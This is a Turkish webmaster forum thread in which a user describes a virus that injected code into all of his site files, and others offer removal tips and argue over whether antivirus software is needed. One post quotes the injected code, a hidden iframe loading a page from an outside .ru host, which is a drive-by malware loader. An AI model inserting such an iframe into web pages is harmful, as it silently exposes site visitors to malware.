İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

bu ne biçim virüs ?

peep

0
İyinet Üyesi
Onaylı Üye
Reaction score
86
hayır hala savaş halindeyiz sanırım o beni ortadan temizliycek :p :D

Darkart

0
İyinet Üyesi
Reaction score
54
spyware dediğinin kendi virüs zaten...
çok eskiden banada bulaşmıştı, ben manule üstesinden gelebildim ama aklımda değil neler yaptığım :(

peep

0
İyinet Üyesi
Onaylı Üye
Reaction score
86
sanırım formatlıycam hiç bir türlü kalkmıyor :eek:

peep

0
İyinet Üyesi
Onaylı Üye
Reaction score
86
bu kadar şerefsizlik olmaz ya yuh
PHP:
<iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"></iframe>
bütün dosyalara eklemiş deliriyorum şuan

WebEngineer

0
İyinet Üyesi
Reaction score
1
Bunun kadar lanet bir virüs görmedim.Banada bulaşmıştı, başlat'a tıklıyorum bütün menüler yok oluyor, daha türlü türlü şeyler çok iğrenç bir virüs boşuna kaspersky vs vs programlarıyla uğraşma çok kuvvetli bir virüs.Çek formatı gitsin.

peep

0
İyinet Üyesi
Onaylı Üye
Reaction score
86
formatı cekebilsem ah işte virüsü temizledim siteleri eski haline döndürürken virüsü yazan şerefli insanada kayıyıorum

yagmayok

1
İyinet Üyesi
Reaction score
89
Dün aramızda konuşurken 4 farklı koruma programı kullandığımı duyunca bana gülüyordun :)

eee, peep ciğim akılsız başın cezasını... :D

Neyse en azından sql'lere zarar gelmeden kurtardın...

sepulchral

0
İyinet Üyesi
Reaction score
2
peep , hadi söyle bize ne yaptında virüs yedin:p söz kimseye söylemicez. Şaka bir yana geçmiş olsun umarım sitelerinide kısa zamanda düzenlersin..

WebEngineer

0
İyinet Üyesi
Reaction score
1
Valla bu virüse 1 kere yakalandım.Yaklaşık 3 yıldır antivirüs kullanmıyorum, bilinçli kullanıcı olunca antivirüs'e gerek kalmıyor.Eğer bilinçsiz kullanılırsa, en kral antivirüs bile kurtaramaz orasıda ayrı bir konu.

yagmayok

1
İyinet Üyesi
Reaction score
89
Valla bu virüse 1 kere yakalandım.Yaklaşık 3 yıldır antivirüs kullanmıyorum, bilinçli kullanıcı olunca antivirüs'e gerek kalmıyor.Eğer bilinçsiz kullanılırsa, en kral antivirüs bile kurtaramaz orasıda ayrı bir konu.

Bu konuda size katılmadığı söylemek isterim. Çünkü ne kadar bilinçli kullanıcı olursan ol girdiğin en popüler bir siteden bile ( superonline, ekolay vs... gibi değil ) virus çıkma ihtimali yüksektir. Siteye girmeden öncede bunu bilemeyeceğimiz için her ne kadar %100 koruma sağlamasa da yardımcı programlar kullanmakta fayda vardır.

Virus bulaşmaması için bilinçi kullanıcı şu şekilde ise evet o zaman virus bulaşmaz tabi. Superonlie, habersiteleri, mynet vs.. gibi siteler dışında bir siteye girmemek. Mailleri kontrol etmemek.

:D

Mehmet

0
İyinet Üyesi
Reaction score
0
Bilinçle antivirüsün en alakası var yahu. Bilinçliyim kapıyı kitlemeden yatıyorum gibi birşey.

peep

0
İyinet Üyesi
Onaylı Üye
Reaction score
86
peep , hadi söyle bize ne yaptında virüs yedin:p söz kimseye söylemicez. Şaka bir yana geçmiş olsun umarım sitelerinide kısa zamanda düzenlersin..

tıkla dediler tıkladım :eek: :p
işin garibi php yazmaya çalışırken birden bişeler olup bitti :s

sivrisinek

0
İyinet Üyesi
Reaction score
2
bu virusler özellikle cok zor kalkiyor ama kalmiyor degil bunlari kaldirmak icin dosya adlarini bulmaniz gerekiyor..

Nereden silebilirsiniz ornek oncelikle bilgisayariniz calistirdan msconfig yapip ilk acilan programlarin hepsini iptal edeceksiniz.

ikincisi regeditten bu ismi arayip bulunanlari sileceksiniz..

ücüncüsü kurulu bir program ve kalkmiyor ise bilgisayari baslatip güvenli kipte acip oradan sileceksiniz kesinlikle silinir.

dördüncüsüde bilgisayari geriye almak buda cözümdür.

WebEngineer

0
İyinet Üyesi
Reaction score
1
Bu konuda size katılmadığı söylemek isterim. Çünkü ne kadar bilinçli kullanıcı olursan ol girdiğin en popüler bir siteden bile ( superonline, ekolay vs... gibi değil ) virus çıkma ihtimali yüksektir. Siteye girmeden öncede bunu bilemeyeceğimiz için her ne kadar %100 koruma sağlamasa da yardımcı programlar kullanmakta fayda vardır.

Virus bulaşmaması için bilinçi kullanıcı şu şekilde ise evet o zaman virus bulaşmaz tabi. Superonlie, habersiteleri, mynet vs.. gibi siteler dışında bir siteye girmemek. Mailleri kontrol etmemek.

:D

O sizin düşünceniz.Ben 3 yıldır antivirüs kullanmadan bilgisayar kullanıyorum, her türlü siteye rahatlıkla girebiliyorum bilinçli olmak yeterli neden bana birşey olmuyor peki.
Bide kendinize sorun, ben 3 yıldır format atmıyorum bilgisayara şifrelerim vs hepside korumada.

Darkart

0
İyinet Üyesi
Reaction score
54
O sizin düşünceniz.Ben 3 yıldır antivirüs kullanmadan bilgisayar kullanıyorum, her türlü siteye rahatlıkla girebiliyorum bilinçli olmak yeterli neden bana birşey olmuyor peki.
Bide kendinize sorun, ben 3 yıldır format atmıyorum bilgisayara şifrelerim vs hepside korumada.

Sen böyle legalpara ederek zaten bilinçsizliğini gösteriyorsun. Herkesin işi ve ihtiyaçları seninle paralel değil. Sen rastlamıyorsundur sadece o kadar. Sitelerdeki linklerin uzantılarında exe olması ya da activex açmamızı istemesine sen bilinç diyorsan sana diyecek birşey yok.

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5